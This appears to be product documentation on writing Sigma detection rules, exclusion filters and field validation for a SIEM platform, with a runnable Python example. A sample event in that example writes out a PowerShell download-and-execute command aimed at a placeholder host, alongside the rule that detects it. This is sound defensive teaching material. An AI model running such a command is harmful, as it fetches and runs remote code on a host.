Detection encompasses the process of searching over your SIEM periodically in order to find malicious or suspicious activity within your environment. As north.sh focuses on empowering security teams, the detection experience brings some additional benefits to ensure threats are detected, and responded to, as fast as possible.
Detection rules can be written in any query language available, but north.sh prefers Sigma for its flexibility and expressiveness. To write a detection rule, head to the Detection page and click Create Detection in the top right. From there you can add all the metadata about your detection as well as the detection itself.
Different detection rules can be deployed to different SIEM instances, according to where your data lives. Certain detection languages can only run on certain SIEM products; for example, Splunk Query Language can only run on Splunk servers.
Filters or exclusions are additions to your detection that filter out unwanted noise. They are usually appended to the detection query and remove results that match known exceptions unique to your environment.
When ensuring your detection rules are valid, it is important to check that each field referenced by the rule individually exists within the SIEM and, where possible, has the correct type. north.sh labels these checks validation rules; they help dramatically with the reliability of detections.
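The following is an added example, not north.sh code, covering the two preceding points: a Sigma-style rule with an exclusion filter for a known-good process in this environment, and a validation pass that checks every field the rule references against a SIEM field schema before the rule runs. The rule, the schema and the events are all constructed for the example and are written as Python literals (the shape a YAML loader would produce) so it runs without extra dependencies; only a small subset of Sigma modifiers and condition syntax is implemented.

```python
"""Validate a Sigma-style detection against a SIEM field schema, then run
its selection and exclusion filter over sample events (example code)."""

# Hypothetical Sigma rule, constructed for this example.
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": "DownloadString",
        },
        # Exclusion: an internal inventory agent that legitimately
        # launches this command line in our environment (constructed).
        "filter_known_tool": {
            "ParentImage|endswith": "\\inventory-agent.exe",
        },
        "condition": "selection and not filter_known_tool",
    },
}

# Constructed SIEM schema: field name -> expected value type.
SCHEMA = {"Image": str, "CommandLine": str, "ParentImage": str, "ProcessId": int}

# Constructed sample events as the SIEM would return them.
EVENTS = [
    {"ProcessId": 4242, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 4243, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString('http://inventory.internal/x')",
     "ParentImage": "C:\\Program Files\\Inventory\\inventory-agent.exe"},
    {"ProcessId": 4244, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c dir", "ParentImage": "C:\\Windows\\explorer.exe"},
]


def validate_rule(rule, schema):
    """Return a list of problems: referenced fields missing from the SIEM
    schema, or literal values whose type does not match the schema."""
    problems = []
    for name, block in rule["detection"].items():
        if name == "condition":
            continue
        for key, value in block.items():
            field = key.split("|", 1)[0]  # strip Sigma modifier
            if field not in schema:
                problems.append(f"{name}: field '{field}' not in SIEM schema")
                continue
            for v in (value if isinstance(value, list) else [value]):
                if not isinstance(v, schema[field]):
                    problems.append(f"{name}: '{field}' expects "
                                    f"{schema[field].__name__}, got {type(v).__name__}")
    return problems


def _match_key(event, key, expected):
    """Match one 'Field|modifier': value pair against an event."""
    field, _, modifier = key.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    if modifier == "endswith":
        return str(actual).endswith(expected)
    if modifier == "contains":
        return expected in str(actual)
    if modifier == "":
        return actual == expected
    raise ValueError(f"unsupported modifier {modifier!r}")


def evaluate(rule, event):
    """Evaluate conditions of the form 'X and not Y and not Z' (subset of
    Sigma condition syntax, enough for selection-plus-exclusions)."""
    detection = rule["detection"]
    result = True
    for part in detection["condition"].split(" and "):
        negate = part.startswith("not ")
        name = part[4:] if negate else part
        matched = all(_match_key(event, k, v) for k, v in detection[name].items())
        result = result and (matched != negate)
    return result


def run_detection(rule, events):
    """Return the events that hit the selection and survive the exclusions."""
    return [e for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print("validation problems:", validate_rule(RULE, SCHEMA))
    for hit in run_detection(RULE, EVENTS):
        print("hit:", hit["ProcessId"], hit["ParentImage"])
```

The validation step is what keeps a rule from silently matching nothing: a typo such as `ComandLine`, or a field that simply is not indexed in this SIEM, is reported before deployment rather than discovered weeks later as a detection gap. The exclusion block shows why filters are appended to the rule rather than edited into the selection: the generic Sigma logic stays intact and portable, while the environment-specific exception lives in its own named block.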